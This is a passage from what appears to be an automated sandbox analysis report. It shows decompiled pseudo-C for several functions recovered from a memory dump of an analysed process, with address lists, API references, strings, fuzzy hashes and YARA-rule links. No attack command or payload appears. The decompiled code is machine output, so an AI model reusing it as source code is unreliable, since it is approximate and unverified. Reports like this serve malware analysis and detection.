												_t65 =  &_a24; // 0x343078
												_v112 =  *((intOrPtr*)(_t168 + 0xc));
												_v116 =  *((intOrPtr*)(_t168 + 8));
												_v108 =  *((intOrPtr*)(_t168 + 0x10));
												_t218 = E00345266( &_v124, _v20, _a4, _a8, _v8, _a16, _a20,  *_t65, _a28, _a32);
												E00340040(_v100);
												_v100 = 0;
												E00340040(_v96);
												_v96 = 0;
												E00340040(_v120);
												_v120 = 0;
												if(_t218 == 0) {
													_v16 = 1;
													goto L37;
												}
												if(_t218 != 2) {
													if(_t218 != 0x6f && _t218 != 3) {
														_t162 =  *((intOrPtr*)(_v48 + _v12 * 4));
														if(( *(_t162 + 4) & 0x00000400) == 0) {
															goto L38;
														}
														if(( *(_t162 + 0x28) & 0x20000000) != 0) {
															goto L36;
														}
														if( *(_t162 + 0x28) != 0x8000000a) {
															goto L38;
														}
													}
												}
												L36:
												_t218 = 0;
												goto L37;
											} else {
												if(( *(_t210 + 0x28) & 0x20000000) != 0 ||  *(_t210 + 0x28) == 0x8000000a) {
													goto L37;
												} else {
													goto L28;
												}
											}
										}
										_t203 =  *((intOrPtr*)(_t144 + 2));
										_t43 =  &(_t181[2]); // 0x2e
										if(_t203 !=  *_t43) {
											break;
										}
										_t144 = _t144 + 4;
										_t181 =  &(_t181[4]);
										if(_t203 != 0) {
											continue;
										}
										goto L24;
									}
									asm("sbb eax, eax");
									_t145 = _t144 | 0x00000001;
									goto L25;
								}
								_t204 =  *((intOrPtr*)(_t140 + 2));
								_t40 =  &(_t180[2]); // 0x200000
								if(_t204 !=  *_t40) {
									break;
								}
								_t140 = _t140 + 4;
								_t180 =  &(_t180[4]);
								if(_t204 != 0) {
									continue;
								}
								goto L17;
							}
							asm("sbb eax, eax");
							_t141 = _t140 | 0x00000001;
							goto L18;
							L37:
							_t143 = _v12 + 1;
							_v12 = _t143;
						} while (_t143 < _v56);
						goto L38;
					}
					_t163 =  *((intOrPtr*)(_t168 + 0x10));
					_v60 = _t163;
					_v64 = _t173;
					_t164 = L"*.*";
					_v68 = 1;
					_v76 = 0;
					if(_t163 == 0) {
						_t164 = "*";
					}
					 *_t173 = _t164;
					_v64[1] = E0034297B(_v72);
					_v64[3] = 0;
					_t218 = E00345590( &_v76, _v20, 0x10, 0x10, _t208, 0, 0, 0, 0, 0);
					_t195 = 0;
					if(_t218 != 0) {
						goto L52;
					} else {
						goto L10;
					}
				}
				if(_t123 != 2) {
					if(_t123 == 3) {
						goto L3;
					}
				} else {
					L3:
					_t216 = _v8 & 0x00000001;
					if(_t216 != 0) {
						goto L4;
					}
				}
				return _t123;
			}

0x00345266
0x00345271
0x00345274
0x00345276
0x0034527b
0x0034527e
0x00345284
0x00345587
0x00000000
0x00345589
0x0034528a
0x00345291
0x0034529d
0x003452af
0x003452b7
0x003452be
0x00345561
0x00345567
0x003452d9
0x003452dc
0x003452e3
0x003452e6
0x003452ec
0x00000000
0x00000000
0x003452f4
0x00000000
0x0034556f
0x00345303
0x0034530b
0x0034530e
0x00345315
0x00345316
0x0034531e
0x00345322
0x0034f105
0x0034f105
0x0034f111
0x0034f117
0x0034f117
0x0034f11a
0x00345380
0x00345387
0x00000000
0x00000000
0x00345391
0x00345394
0x00345521
0x00345524
0x0034552c
0x00345537
0x0034553f
0x00345547
0x0034554e
0x00000000
0x00345555
0x00345555
0x00345557
0x00345557
0x00000000
0x00345557
0x00000000
0x00000000
0x00000000
0x0034539a
0x0034539a
0x0034539d
0x003453a5
0x003453a8
0x003453a8
0x003453ab
0x003453ae
0x003453ae
0x003453b4
0x00000000
0x00000000
0x003453bd
0x003453d8
0x003453d8
0x003453da
0x003453dc
0x00000000
0x00000000
0x003453e2
0x003453e7
0x003453e7
0x003453ea
0x003453ea
0x003453f0
0x00000000
0x00000000
0x003453f9
0x00345414
0x00345414
0x00345416
0x00345418
0x00000000
0x00000000
0x00345422
0x00345431
0x00345431
0x00345436
0x00345436
0x00345439
0x00345439
0x0034543c
0x0034543f
0x00345444
0x00345449
0x0034544b
0x0034544d
0x00345450
0x00345450
0x00345453
0x00345456
0x0034545e
0x00345461
0x00345463
0x0034546b
0x0034f193
0x0034f19e
0x0034f1a6
0x00000000
0x0034f1a6
0x0034547a
0x0034547f
0x00345482
0x00345485
0x0034548c
0x00000000
0x00000000
0x00345498
0x0034549d
0x003454b1
0x003454b4
0x003454c0
0x003454cc
0x003454da
0x003454dc
0x003454e6
0x003454e9
0x003454f1
0x003454f4
0x003454fb
0x00345500
0x0034f140
0x00000000
0x0034f140
0x00345509
0x0034f14f
0x0034f164
0x0034f16e
0x00000000
0x00000000
0x0034f17b
0x00000000
0x00000000
0x0034f188
0x00000000
0x00000000
0x0034f18e
0x0034f14f
0x0034550f
0x0034550f
0x00000000
0x0034f121
0x0034f128
0x00000000
0x0034f13b
0x00000000
0x0034f13b
0x0034f128
0x00345422
0x003453fb
0x003453ff
0x00345403
0x00000000
0x00000000
0x00345409
0x0034540c
0x00345412
0x00000000
0x00000000
0x00000000
0x00345412
0x0034557d
0x0034557f
0x00000000
0x0034557f
0x003453bf
0x003453c3
0x003453c7
0x00000000
0x00000000
0x003453cd
0x003453d0
0x003453d6
0x00000000
0x00000000
0x00000000
0x003453d6
0x00345573
0x00345575
0x00000000
0x00345511
0x00345514
0x00345515
0x00345518
0x00000000
0x0034539a
0x00345328
0x0034532b
0x00345330
0x00345333
0x00345338
0x0034533f
0x00345342
0x00345344
0x00345344
0x00345349
0x0034535e
0x0034536c
0x00345374
0x00345376
0x0034537a
0x00000000
0x00000000
0x00000000
0x00000000
0x0034537a
0x003452c7
0x0034f0fa
0x00000000
0x0034f100
0x003452cd
0x003452cd
0x003452d0
0x003452d3
0x00000000
0x00000000
0x003452d3
0x0034555e

APIs

Part of subcall function 00345590: memset.MSVCRT ref: 00345614

Part of subcall function 00340040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,003436B3,00343691,00000000), ref: 00340078
Part of subcall function 00340040: RtlFreeHeap.NTDLL(00000000), ref: 0034007F

memset.MSVCRT ref: 00345303

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

memset.MSVCRT ref: 0034547A
longjmp.MSVCRT(0036B8B8,00000001,?,?,?), ref: 0034F111

Strings

*.*, xrefs: 00345333
x04, xrefs: 0034529D, 003454B1, 003452A0

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$memset$Process$AllocFreelongjmp
String ID: *.*$x04
API String ID: 539101449-3409324424
Opcode ID: 9227a76b116550ebc253a5edaecc05e00f435c37d1c7f95d8d80fb8908a2d617
Instruction ID: 1961127668c624fb9937fc4c637e412e3192513fc5f33922a88c42248f28f657
Opcode Fuzzy Hash: 9227a76b116550ebc253a5edaecc05e00f435c37d1c7f95d8d80fb8908a2d617
Instruction Fuzzy Hash: 4DB1AD71E006199FCB26DFA5C841AAEB7F6AF55310F1680A9E806AF252D731FD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0033FE10, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0033FE10(void* __ebx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t38;
				signed int _t49;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				signed int _t73;
				signed int _t75;
				void* _t78;
				signed int _t79;
				short* _t80;
				signed int _t83;
				void* _t89;
				signed int _t91;
				signed int _t93;
				void* _t95;
				void* _t99;
				signed int _t102;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t120;
				void* _t121;

				_t121 = _t120 - 0x14;
				_push(_t113);
				_t79 = 0x4002;
				_t35 = E003400B0(0x4002);
				_v8 = _t35;
				_t104 = _t35;
				if(_t35 == 0) {
					memset(0x363890, 0, 0x4006);
					_t121 = _t121 + 0xc;
					 *0x36b8a4 = 0x363892;
					__imp__longjmp(0x36b8f8, 0xffffffff);
					goto L37;
				} else {
					_t113 =  *0x36b8a4;
					_t102 = 0x2001;
					_t79 = _t35;
					_t78 = _t113 - _t35;
					while(1) {
						_t2 = _t102 + 0x7fffdffd; // 0x7ffffffe
						if(_t2 == 0) {
							break;
						}
						_t73 =  *(_t78 + _t79) & 0x0000ffff;
						if(_t73 == 0) {
							break;
						} else {
							 *_t79 = _t73;
							_t79 = _t79 + 2;
							_t102 = _t102 - 1;
							if(_t102 != 0) {
								continue;
							} else {
								L37:
								_t80 = _t79 - 2;
							}
						}
						goto L7;
					}
					__eflags = _t102;
					if(_t102 == 0) {
						goto L37;
					}
				}
				L7:
				_t75 = 0;
				 *_t80 = 0;
				_t81 = _t104;
				_v12 = 0;
				_t38 =  *_t104 & 0x0000ffff;
				if(_t38 == 0) {
					L13:
					 *0x36b8a4 = 0x363892;
					 *_t113 = 0;
					if(_t75 > 0x2001) {
						__eflags = 0;
						 *0x363892 = 0;
						goto L40;
					} else {
						return E00340040(_t81);
					}
				} else {
					while(1) {
						_t83 = _t104;
						_t104 = _t104 + 2;
						_v16 = _t83;
						if(_t75 > 0x2001) {
							break;
						}
						if(_t38 == 0x25) {
							_t93 =  *0x373cc4;
							__eflags = _t93;
							if(__eflags == 0) {
								L19:
								_t81 = E00338F70(0x36b8f8, _t104, __eflags,  &_v12, 0x25);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  *0x373cc4;
									_t113 =  *0x36b8a4;
									if( *0x373cc4 == 0) {
										goto L33;
									} else {
										_t104 = _v16 + (_v12 + 1) * 2;
									}
									goto L11;
								} else {
									goto L20;
								}
							} else {
								_t54 =  *_t104 & 0x0000ffff;
								__eflags = _t54 - 0x25;
								if(_t54 == 0x25) {
									_t29 = _t83 + 4; // 0x4
									_t104 = _t29;
									L33:
									 *_t113 = 0x25;
									_t113 = _t113 + 2;
									_t75 = _t75 + 1;
									goto L24;
								} else {
									__eflags = _t54 - 0x2a;
									if(_t54 == 0x2a) {
										__eflags =  *0x373cc9;
										if( *0x373cc9 == 0) {
											goto L18;
										} else {
											_t99 =  *(_t93 + 0x34);
											_t18 = _t83 + 4; // 0x4
											_t104 = _t18;
											__eflags = _t99;
											if(_t99 == 0) {
												goto L11;
											} else {
												_t89 = _t99;
												_v16 = _t89 + 2;
												do {
													_t59 =  *_t89;
													_t89 = _t89 + 2;
													__eflags = _t59;
												} while (_t59 != 0);
												_t91 = _t89 - _v16 >> 1;
												_v20 = _t91;
												__eflags = _t91;
												if(_t91 <= 0) {
													goto L11;
												} else {
													_t60 = _t91 + _t75;
													_v16 = _t60;
													__eflags = _t60 - 0x2000;
													if(_t60 > 0x2000) {
														memcpy(_t113, _t99, 0x2000 - _t75 + 0x2000 - _t75);
														 *0x367892 = 0;
														E0033C5A2(_t91, 0x234f, 1, 0x363892);
														goto L41;
													} else {
														E00341040(_t113, 0x2003 - (_t113 - 0x363890 >> 1), _t99);
														_t75 = _v16;
														_t113 = _t113 + _v20 * 2;
														 *0x36b8a4 = _t113;
														goto L11;
													}
												}
											}
										}
									} else {
										L18:
										_t81 = E00341969(0x36b8f8, _t104,  &_v12, L"0123456789", _t93 + 0x3c);
										__eflags = _t81;
										if(__eflags != 0) {
											L20:
											_t108 = _t81;
											_t10 = _t108 + 2; // 0x2
											_t95 = _t10;
											do {
												_t49 =  *_t108;
												_t108 = _t108 + 2;
												__eflags = _t49;
											} while (_t49 != 0);
											_t110 = _t108 - _t95 >> 1;
											_t75 = _t75 + _t110;
											__eflags = _t75 - 0x2001;
											if(_t75 > 0x2001) {
												L40:
												_push(0);
												_push(0x233f);
												E0033C5A2(_t81);
												L41:
												_t82 = _v8;
												E00340040(_v8);
												__imp__longjmp(0x36b8f8, 0xffffffff);
												asm("int3");
												_push(0);
												_push(8);
												E0033C5A2(_t82);
												__eflags = 0;
												return 0;
											} else {
												_t116 =  *0x36b8a4;
												E00341040(_t116, 0x2003 - (_t116 - 0x363890 >> 1), _t81);
												_t113 = _t116 + _t110 * 2;
												_t112 = _v12 + 1;
												__eflags = _t112;
												_t104 = _v16 + _t112 * 2;
												L24:
												 *0x36b8a4 = _t113;
												goto L11;
											}
										} else {
											goto L19;
										}
									}
								}
							}
						} else {
							 *_t113 = _t38;
							_t75 = _t75 + 1;
							_t113 = _t113 + 2;
							 *0x36b8a4 = _t113;
							if(_t38 == 0xa) {
								break;
							} else {
								L11:
								_t38 =  *_t104 & 0x0000ffff;
								if(_t38 != 0) {
									continue;
								} else {
									break;
								}
							}
						}
						goto L43;
					}
					_t81 = _v8;
					goto L13;
				}
				L43:
			}

0x0033fe15
0x0033fe19
0x0033fe1b
0x0033fe20
0x0033fe25
0x0033fe28
0x0033fe2c
0x0034c954
0x0034c959
0x0034c95c
0x0034c96d
0x00000000
0x0033fe32
0x0033fe32
0x0033fe38
0x0033fe3f
0x0033fe41
0x0033fe43
0x0033fe43
0x0033fe4b
0x00000000
0x00000000
0x0033fe4d
0x0033fe54
0x00000000
0x0033fe56
0x0033fe56
0x0033fe59
0x0033fe5c
0x0033fe5f
0x00000000
0x0033fe61
0x0034c973
0x0034c973
0x0034c973
0x0033fe5f
0x00000000
0x0033fe54
0x0033fe66
0x0033fe68
0x00000000
0x00000000
0x0033fe68
0x0033fe6e
0x0033fe70
0x0033fe72
0x0033fe75
0x0033fe77
0x0033fe7a
0x0033fe80
0x0033feb6
0x0033feb8
0x0033fec2
0x0033fecb
0x0034c9ad
0x0034c9af
0x00000000
0x0033fed1
0x0033fedc
0x0033fedc
0x0033fe82
0x0033fe82
0x0033fe82
0x0033fe84
0x0033fe87
0x0033fe90
0x00000000
0x00000000
0x0033fe96
0x0033fedd
0x0033fee3
0x0033fee5
0x0033ff1b
0x0033ff2d
0x0033ff2f
0x0033ff31
0x00340022
0x00340029
0x0034002f
0x00000000
0x00340031
0x00340038
0x00340038
0x00000000
0x00000000
0x00000000
0x00000000
0x0033fee7
0x0033fee7
0x0033feea
0x0033feed
0x0034000e
0x0034000e
0x00340011
0x00340016
0x00340019
0x0034001c
0x00000000
0x0033fef3
0x0033fef3
0x0033fef6
0x0033ff93
0x0033ff9a
0x00000000
0x0033ffa0
0x0033ffa0
0x0033ffa3
0x0033ffa3
0x0033ffa6
0x0033ffa8
0x00000000
0x0033ffae
0x0033ffae
0x0033ffb3
0x0033ffb6
0x0033ffb6
0x0033ffb9
0x0033ffbc
0x0033ffbc
0x0033ffc4
0x0033ffc6
0x0033ffc9
0x0033ffcb
0x00000000
0x0033ffd1
0x0033ffd1
0x0033ffd4
0x0033ffd7
0x0033ffdc
0x0034c987
0x0034c991
0x0034c9a3
0x00000000
0x0033ffe2
0x0033fff5
0x0033fffd
0x00340000
0x00340003
0x00000000
0x00340003
0x0033ffdc
0x0033ffcb
0x0033ffa8
0x0033fefc
0x0033fefc
0x0033ff15
0x0033ff17
0x0033ff19
0x0033ff37
0x0033ff37
0x0033ff39
0x0033ff39
0x0033ff40
0x0033ff40
0x0033ff43
0x0033ff46
0x0033ff46
0x0033ff4d
0x0033ff4f
0x0033ff51
0x0033ff57
0x0034c9b5
0x0034c9b5
0x0034c9b7
0x0034c9bc
0x0034c9c4
0x0034c9c4
0x0034c9c7
0x0034c9d3
0x0034c9d9
0x0034c9da
0x0034c9dc
0x0034c9de
0x0034c9e6
0x0034c9e9
0x0033ff5d
0x0033ff5d
0x0033ff76
0x0033ff7e
0x0033ff84
0x0033ff84
0x0033ff85
0x0033ff88
0x0033ff88
0x00000000
0x0033ff88
0x00000000
0x00000000
0x00000000
0x0033ff19
0x0033fef6
0x0033feed
0x0033fe98
0x0033fe98
0x0033fe9b
0x0033fe9c
0x0033fe9f
0x0033fea9
0x00000000
0x0033feab
0x0033feab
0x0033feab
0x0033feb1
0x00000000
0x00000000
0x00000000
0x00000000
0x0033feb1
0x0033fea9
0x00000000
0x0033fe96
0x0033feb3
0x00000000
0x0033feb3
0x00000000

APIs

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

memset.MSVCRT ref: 0034C954
longjmp.MSVCRT(0036B8F8,000000FF,00000000,00363892,00363890,?,?,?,?,0033FD5C,?,?,?,0034837D,00000000), ref: 0034C96D
memcpy.MSVCRT ref: 0034C987
longjmp.MSVCRT(0036B8F8,000000FF,00363892,00363890,?,?,?,?,0033FD5C,?,?,?,0034837D,00000000), ref: 0034C9D3

Strings

0123456789, xrefs: 0033FF05

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heaplongjmp$AllocProcessmemcpymemset
String ID: 0123456789
API String ID: 2034586978-2793719750
Opcode ID: 08282ff6278d551ce39a5636544d6acf122c7529d058419a68aba9fa2b7eebed
Instruction ID: 420e16c943b05c4ee1bc01d8ba36225ca49a6b1d6fddf65a9c92af3421b44d37
Opcode Fuzzy Hash: 08282ff6278d551ce39a5636544d6acf122c7529d058419a68aba9fa2b7eebed
Instruction Fuzzy Hash: E4711735F002019FDB279B69CC857AA73E9EF84300F598079E905AF395EB75AD868780

Uniqueness

Uniqueness Score: -1.00%

Function 00346390, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00346390(void* __ecx, long __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				void* _v36;
				void _v556;
				signed int _v560;
				signed short* _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				intOrPtr _t47;
				void* _t54;
				void* _t61;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t78;
				signed int _t83;
				signed short* _t92;
				void* _t97;
				signed int _t100;
				intOrPtr _t102;
				void* _t103;
				signed int _t104;
				signed short* _t106;
				int _t108;
				void* _t109;
				signed int _t110;
				signed int _t115;

				_t95 = __edx;
				_t71 = _t115;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t71 + 4));
				_t113 = (_t115 & 0xfffffff8) + 4;
				_t35 =  *0x35d0b4; // 0xd59bd0e8
				_v16 = _t35 ^ (_t115 & 0xfffffff8) + 0x00000004;
				_t102 =  *((intOrPtr*)(_t71 + 8));
				_t108 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E00340C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t47 = 1;
					L32:
					_t108 = _t47;
					L10:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t103);
					_pop(_t109);
					return E00346FD0(_t108, _t71, _v16 ^ _t113, _t95, _t103, _t109);
				}
				_t104 = E0033EA40( *((intOrPtr*)(_t102 + 0x3c)), 0x3324ac, (0 |  *0x373cc9 != 0x00000000) + 2);
				_v560 = _t104;
				if( *0x373cc9 == 0) {
					L4:
					_t78 = _t104;
					_t17 = _t78 + 2; // 0x2
					_t97 = _t17;
					do {
						_t54 =  *_t78;
						_t78 = _t78 + 2;
					} while (_t54 != _t108);
					_v560 = _t78 - _t97 >> 1;
					E00341040(_t104, _v560 + 1, E003422C0(_t71, _t104));
					_t95 =  *_t104 & 0x0000ffff;
					if(_t95 != 0) {
						_t83 = _t104;
						_t26 = _t83 + 2; // 0x2
						_v560 = _t26;
						do {
							_t58 =  *_t83;
							_t83 = _t83 + 2;
						} while (_t58 != _t108);
						if(_t83 - _v560 >> 1 != 2 ||  *((short*)(_t104 + 2)) != 0x3a || iswalpha(_t95) == 0) {
							_t47 = E00358371(_t58, _t104);
							 *0x36b8b0 = _t47;
							goto L32;
						} else {
							_t88 = _v36;
							if(_v36 == 0) {
								_t88 =  &_v556;
							}
							_t95 = _v28;
							E003436CB(_t71, _t88, _v28,  *_t104 & 0x0000ffff);
							_t61 = _v36;
							if(_t61 == 0) {
								_t61 =  &_v556;
							}
							L9:
							_push(_t61);
							E003425D9(L"%s\r\n");
							 *0x36b8b0 = _t108;
							goto L10;
						}
					}
					_t91 =  *0x373cb8;
					if( *0x373cb8 == 0) {
						_t91 = 0x373ab0;
					}
					_t95 =  *0x373cc0;
					E003436CB(_t71, _t91,  *0x373cc0, _t108);
					_t61 =  *0x373cb8;
					if(_t61 == 0) {
						_t61 = 0x373ab0;
					}
					goto L9;
				}
				_t64 =  *_t104 & 0x0000ffff;
				_t92 = _t104;
				_t110 = _t104;
				if(_t64 != 0) {
					_t100 = _t64;
					do {
						 *_t110 = _t100;
						if(_t100 == 0) {
							L17:
							_v564 =  &(_t92[1]);
							while(1) {
								_t23 = _t110 - 2; // -4
								_t106 = _t23;
								if(iswspace( *_t106 & 0x0000ffff) == 0) {
									goto L20;
								}
								_t110 = _t106;
							}
							goto L20;
						} else {
							goto L16;
						}
						do {
							L16:
							_t92 =  &(_t92[1]);
							_t110 = _t110 + 2;
							_t69 =  *_t92 & 0x0000ffff;
							 *_t110 = _t69;
						} while (_t69 != 0);
						goto L17;
						L20:
						_t92 = _v564;
						 *_t110 = 0;
						_t110 = _t110 + 2;
						_t68 =  *_t92 & 0x0000ffff;
						_t100 = _t68;
					} while (_t68 != 0);
					_t104 = _v560;
				}
				 *_t110 = 0;
				_t108 = 0;
				goto L4;
			}

0x00346390
0x00346393
0x00346395
0x00346396
0x003463a1
0x003463a5
0x003463ad
0x003463b4
0x003463b9
0x003463c2
0x003463c4
0x003463cd
0x003463d2
0x003463d6
0x003463ff
0x0034f71c
0x0034f7f0
0x0034f7f0
0x003464bc
0x003464bf
0x003464cb
0x003464ce
0x003464da
0x003464da
0x00346428
0x0034642a
0x00346430
0x00346449
0x00346449
0x0034644b
0x0034644b
0x0034644e
0x0034644e
0x00346451
0x00346454
0x0034645d
0x00346474
0x00346479
0x0034647f
0x0034f77f
0x0034f781
0x0034f784
0x0034f78a
0x0034f78a
0x0034f78d
0x0034f790
0x0034f7a0
0x0034f7e6
0x0034f7eb
0x00000000
0x0034f7b5
0x0034f7b5
0x0034f7ba
0x0034f7bc
0x0034f7bc
0x0034f7c5
0x0034f7c9
0x0034f7ce
0x0034f7d3
0x0034f7d9
0x0034f7d9
0x003464a9
0x003464a9
0x003464af
0x003464b6
0x00000000
0x003464b6
0x0034f7a0
0x00346485
0x00346492
0x003464dd
0x003464dd
0x00346494
0x0034649b
0x003464a0
0x003464a7
0x003464e1
0x003464e1
0x00000000
0x003464a7
0x00346432
0x00346435
0x00346437
0x0034643c
0x0034f722
0x0034f724
0x0034f724
0x0034f72a
0x0034f73d
0x0034f740
0x0034f74a
0x0034f74a
0x0034f74a
0x0034f75a
0x00000000
0x00000000
0x0034f748
0x0034f748
0x00000000
0x00000000
0x00000000
0x00000000
0x0034f72c
0x0034f72c
0x0034f72c
0x0034f72f
0x0034f732
0x0034f735
0x0034f738
0x00000000
0x0034f75c
0x0034f75c
0x0034f764
0x0034f767
0x0034f76a
0x0034f76d
0x0034f76f
0x0034f774
0x0034f774
0x00346444
0x00346447
0x00000000

APIs

memset.MSVCRT ref: 003463D6

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EAB7
Part of subcall function 0033EA40: iswspace.MSVCRT ref: 0033EB2D
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB49
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB6D

??_V@YAXPAX@Z.MSVCRT ref: 003464BF
iswspace.MSVCRT ref: 0034F751

Strings

%s, xrefs: 003464AA

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$iswspacememset
String ID: %s
API String ID: 2220997661-3043279178
Opcode ID: 72c9f33efab31dffb056fed43176215dab53887bcb2ff4316408c46fa4432333
Instruction ID: b75fbb9137d5cb4e4d4c15b5e9bb12351c040f3ec5ac95af857cde1368699588
Opcode Fuzzy Hash: 72c9f33efab31dffb056fed43176215dab53887bcb2ff4316408c46fa4432333
Instruction Fuzzy Hash: 75510575A001169BCB26DF69D8826BBB7F9EF44350F19016EE845DF340EB34AE81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003585E9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E003585E9(intOrPtr __ecx, signed int __edx) {
				signed int _v20;
				int _v32;
				char _v36;
				int _v40;
				void _v560;
				int _v568;
				char _v572;
				int _v576;
				void _v1096;
				int _v1104;
				char _v1108;
				int _v1112;
				void* _v1124;
				void _v1632;
				intOrPtr _v1636;
				signed int _v1640;
				int _v1644;
				signed int* _v1648;
				signed int* _v1652;
				signed int _v1656;
				intOrPtr _v1660;
				char _v1664;
				void* _v1668;
				void* _v1672;
				void* _v1676;
				void* _v1680;
				void* _v1684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t196;
				signed int _t198;
				void* _t218;
				void* _t232;
				signed int _t236;
				void* _t237;
				signed int _t239;
				void* _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				signed char _t258;
				intOrPtr _t260;
				void* _t263;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t282;
				signed int _t290;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t295;
				void* _t296;
				signed int _t297;
				void* _t298;
				signed int _t299;
				void* _t300;
				void* _t303;
				intOrPtr _t305;
				signed int _t307;
				void* _t316;
				void* _t317;
				signed int _t346;
				void* _t348;
				void* _t352;
				intOrPtr _t354;
				intOrPtr _t356;
				void* _t357;
				WCHAR* _t358;
				signed int _t359;
				signed int _t368;
				intOrPtr _t371;
				signed int _t392;
				signed int _t412;
				void* _t414;
				signed int _t416;
				signed int _t418;
				intOrPtr _t419;
				void* _t420;
				signed int* _t421;
				void* _t422;
				signed int _t426;
				signed int _t428;
				signed int _t431;
				void* _t435;

				_t391 = __edx;
				_t318 = __ecx;
				_t418 = __edx;
				if(__ecx != 0) {
					_push(0);
					_push(__ecx);
					E0033C108(__ecx);
					_pop(_t318);
				}
				if(_t418 == 1) {
					_t418 = 0x373d00;
					E0034274C(0x373d00, 0x104, L"%9d",  *0x35d56c);
					E0033C108(_t318, 0x2336, 1, 0x373d00);
					_t426 = _t426 + 0x1c;
				}
				 *0x35d560 =  *0x378064 & 0x000000ff;
				while(1) {
					_t196 =  *0x35d5dc; // 0x0
					_t435 =  *0x35d568 - _t196; // 0x0
					if(_t435 >= 0) {
						break;
					}
					_t318 =  *((intOrPtr*)( *0x373cf4 + _t196 * 4 - 4));
					E0033CD27(_t318);
				}
				__imp__longjmp(0x36b8f8, 1);
				asm("int3");
				_t428 = (_t426 & 0xfffffff8) - 0x67c;
				_t198 =  *0x35d0b4; // 0xd59bd0e8
				_v20 = _t198 ^ _t428;
				_push(_t418);
				_push(_t412);
				_v1640 = _t391;
				_t419 = _t318;
				_v1104 = 0x104;
				_v1644 = 0;
				_t316 = 1;
				_v1112 = 0;
				_t413 = _t412 | 0xffffffff;
				_v1108 = 1;
				memset( &_v1632, 0, 0x104);
				_v36 = 1;
				_v32 = 0x104;
				_v40 = 0;
				memset( &_v560, 0, 0x104);
				_v572 = 1;
				_v568 = 0x104;
				_v576 = 0;
				memset( &_v1096, 0, 0x104);
				_t431 = _t428 + 0x24;
				if(E00340C70( &_v1632, ((0 | _v1108 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00340C70( &_v560, ((0 | _v36 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00340C70( &_v1096, ((0 | _v572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L141:
					E00340DE8(E00340DE8(E00340DE8(_t214,  &_v1096),  &_v560),  &_v1632);
					_t218 = _t316;
				} else {
					_t214 = E0033585F(0xfe00,  &_v1648, 0);
					_v1668 = _t214;
					if(_t214 == 0) {
						goto L141;
					} else {
						if( *0x35d560 == 0) {
							_t232 = _v1648;
							goto L17;
